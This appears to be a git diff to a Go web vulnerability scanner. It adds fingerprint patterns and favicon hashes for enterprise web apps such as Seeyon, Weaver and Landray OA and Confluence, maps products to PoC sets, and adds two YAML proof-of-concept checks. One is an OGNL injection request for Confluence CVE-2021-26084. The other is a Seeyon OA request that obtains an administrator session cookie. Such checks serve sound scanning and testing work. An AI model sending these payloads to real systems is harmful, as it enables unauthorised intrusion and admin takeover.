+	{"致远OA", "code", "(/seeyon/USER-DATA/IMAGES/LOGIN/login.gif|/seeyon/common/)"},
+	{"蓝凌EIS智慧协同平台", "code", "(/scripts/jquery.landray.common.js)"},
+	{"深信服ssl-vpn", "code", "(login_psw.csp|loginPageSP/loginPrivacy.js|/por/login_psw.csp)"},
+	{"Struts2", "code", "(org.apache.struts2|Struts Problem Report|struts.devMode|struts-tags|There is no Action mapped for namespace)"},
+	{"泛微OA", "code", "(/spa/portal/public/index.js|wui/theme/ecology8/page/images/login/username_wev8.png|/wui/index.html#/?logintype=1)"},
+	{"Swagger UI", "code", "(/swagger-ui.css|swagger-ui-bundle.js|swagger-ui-standalone-preset.js)"},
+	{"金蝶政务GSiS", "code", "(/kdgs/script/kdgs.js|HTML5/content/themes/kdcss.min.css|/ClientBin/Kingdee.BOS.XPF.App.xap)"},
+	{"蓝凌OA", "code", "(蓝凌软件|StylePath:\"/resource/style/default/\"|/resource/customization|sys/ui/extend/theme/default/style/icon.css|sys/ui/extend/theme/default/style/profile.css)"},
+	{"用友NC", "code", "(YONYOU NC | /Client/Uclient/UClient.dmg)"},
+	{"用友IUFO", "code", "(iufo/web/css/menu.css)"},
+	{"TELEPORT堡垒机", "code", "(/static/plugins/blur/background-blur.js)"},
+	{"JEECMS", "code", "(/r/cms/www/red/js/common.js|/r/cms/www/red/js/indexshow.js|Powered by JEECMS|JEECMS|/jeeadmin/jeecms/index.do)"},
+	{"CMS", "code", "(Powered by .*CMS)"},
+	{"editor", "code", "(editor)"},
+	{"ATLASSIAN-Confluence","code","(confluence.)"},
 }
 
 var Md5Datas = []Md5Data{
 	{"BIG-IP", "04d9541338e525258daf47cc844d59f3"},
 	{"蓝凌OA", "302464c3f6207d57240649926cfc7bd4"},
 	{"JBOSS", "799f70b71314a7508326d1d2f68f7519"},
-	{"锐捷网关", "d8d7c9138e93d43579ebf2e384745ba8"},
+	{"锐捷网络", "d8d7c9138e93d43579ebf2e384745ba8"},
+	{"锐捷网络", "9c21df9129aeec032df8ac15c84e050d"},
+	{"锐捷网络", "a45883b12d753bc87aff5bddbef16ab3"},
 	{"深信服edr", "0b24d4d5c7d300d50ee1cd96059a9e85"},
 	{"致远OA", "cdc85452665e7708caed3009ecb7d4e2"},
 	{"致远OA", "17ac348fcce0b320e7bfab3fe2858dfa"},
@@ -159,18 +272,27 @@ var Md5Datas = []Md5Data{
 	{"SpringBoot", "0488faca4c19046b94d07c3ee83cf9d6"},
 	{"ThinkPHP", "f49c4a4bde1eec6c0b80c2277c76e3db"},
 	{"通达OA", "ed0044587917c76d08573577c8b72883"},
-	{"泛微OA", "41eca7a9245394106a09b2534d8030df"},
+	{"泛微E-mobile", "41eca7a9245394106a09b2534d8030df"},
 	{"泛微OA", "c27547e27e1d2c7514545cd8d5988946"},
 	{"泛微OA", "9b1d3f08ede38dbe699d6b2e72a8febb"},
 	{"泛微OA", "281348dd57383c1f214ffb8aed3a1210"},
 	{"GitLab", "85c754581e1d4b628be5b7712c042224"},
 	{"Hikvision-视频监控", "89b932fcc47cf4ca3faadb0cfdef89cf"},
+	{"华夏erp", "c68b15c45cf80115a943772f7d0028a6"},
+	{"OpenSNS", "08711abfb016a55c0e84f7b54bef5632"},
+	{"MetInfo-米拓建站", "2a9541b5c2225ed2f28734c0d75e456f"},
+	{"IBM-Lotus-Domino", "36c1002bb579edf52a472b9d2e39bb50"},
+	{"IBM-Lotus-Domino", "639b61409215d770a99667b446c80ea1"},
+	{"ATLASSIAN-Confluence", "b91d19259cf480661ef93b67beb45234"},
+	{"activemq", "05664fb0c7afcd6436179437e31f3aa6"},
+	{"coremail", "ad74ff8f9a2f630fc2c5e6b3aa0a5cb8"},
 }
 
 var PocDatas = []PocData{
 	{"致远OA", "seeyon"},
-	{"泛微OA", "weaver-oa"},
+	{"泛微OA", "weaver"},
 	{"通达OA", "tongda"},
+	{"蓝凌OA", "landray"},
 	{"ThinkPHP", "thinkphp"},
 	{"Nexus", "nexus"},
 	{"齐治堡垒机", "qizhi"},
@@ -179,6 +301,8 @@ var PocDatas = []PocData{
 	{"zabbix", "zabbix"},
 	{"VMware vSphere", "vmware"},
 	{"Jboss", "jboss"},
-	{"用友NC", "yongyou"},
+	{"用友", "yongyou"},
 	{"用友IUFO", "yongyou"},
+	{"coremail", "coremail"},
+	{"金山", "kingsoft"},
 }
diff --git a/WebScan/pocs/atlassian-confluence-rce.yml b/WebScan/pocs/atlassian-confluence-rce.yml
new file mode 100644
index 0000000..782fff2
--- /dev/null
+++ b/WebScan/pocs/atlassian-confluence-rce.yml
@@ -0,0 +1,17 @@
+name: poc-yaml-atlassian-confluence-rce
+set:
+  rand1: randomInt(1000, 9999)
+  rand2: randomInt(400, 9999)
+rules:
+  - method: POST
+    path: "/pages/createpage-entervariables.action"
+    follow_redirects: true
+    body: |
+      queryString=alt3kx\u0027%2b#{{{rand1}}*{{rand2}}}%2b\u0027
+    expression: |
+      response.status == 200 && response.body.bcontains(bytes(string(rand1 * rand2)))
+detail:
+  author: tangshoupu
+  info: Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)
+  links:
+    - https://mp.weixin.qq.com/s/lVCT6JAA_BU9h4ISLlMNbQ
\ No newline at end of file
diff --git a/WebScan/pocs/seeyon-oa-cookie-leak.yml b/WebScan/pocs/seeyon-oa-cookie-leak.yml
new file mode 100644
index 0000000..e746c4b
--- /dev/null
+++ b/WebScan/pocs/seeyon-oa-cookie-leak.yml
@@ -0,0 +1,16 @@
+name: poc-yaml-seeyon-oa-cookie-leak
+rules:
+  - method: POST
+    path: /seeyon/thirdpartyController.do
+    body: |
+      method=access&enc=TT5uZnR0YmhmL21qb2wvZXBkL2dwbWVmcy9wcWZvJ04%2BLjgzODQxNDMxMjQzNDU4NTkyNzknVT4zNjk0NzI5NDo3MjU4&clientPath=127.0.0.1
+    expression: |
+      response.status == 200 && response.headers["Set-Cookie"].contains("JSESSIONID=") && response.body.bcontains(b"/seeyon/common/")
+  - method: GET
+    path: /seeyon/main.do?method=headerjs
+    expression: |
+      response.status == 200 && response.body.bcontains(b"\"name\":\"系统管理员\"") && response.body.bcontains(b"\"id\":\"-7273032013234748168\"")
+detail:
+  author: Print1n(http://print1n.top)
+  links:
+    - https://mp.weixin.qq.com/s/0AqdfTrZUVrwTMbKEKresg
\ No newline at end of file
diff --git a/WebScan/pocs/ecology-sqli.yml b/WebScan/pocs/weaver-ecology-sqli.yml
similarity index 100%
rename from WebScan/pocs/ecology-sqli.yml
rename to WebScan/pocs/weaver-ecology-sqli.yml
diff --git a/WebScan/pocs/ecology-validate-sqli.yml b/WebScan/pocs/weaver-ecology-validate-sqli.yml
similarity index 100%
rename from WebScan/pocs/ecology-validate-sqli.yml
rename to WebScan/pocs/weaver-ecology-validate-sqli.yml
diff --git a/WebScan/pocs/ecology-workflowservicexml-2.yml b/WebScan/pocs/weaver-ecology-workflowservicexml-2.yml
similarity index 100%
rename from WebScan/pocs/ecology-workflowservicexml-2.yml
rename to WebScan/pocs/weaver-ecology-workflowservicexml-2.yml
diff --git a/WebScan/pocs/ecology-workflowservicexml.yml b/WebScan/pocs/weaver-ecology-workflowservicexml.yml
similarity index 100%
rename from WebScan/pocs/ecology-workflowservicexml.yml
rename to WebScan/pocs/weaver-ecology-workflowservicexml.yml
diff --git a/WebScan/pocs/poc-yaml-weblogic-console-weak.yml b/WebScan/pocs/weblogic-console-weak.yml
similarity index 100%
rename from WebScan/pocs/poc-yaml-weblogic-console-weak.yml
rename to WebScan/pocs/weblogic-console-weak.yml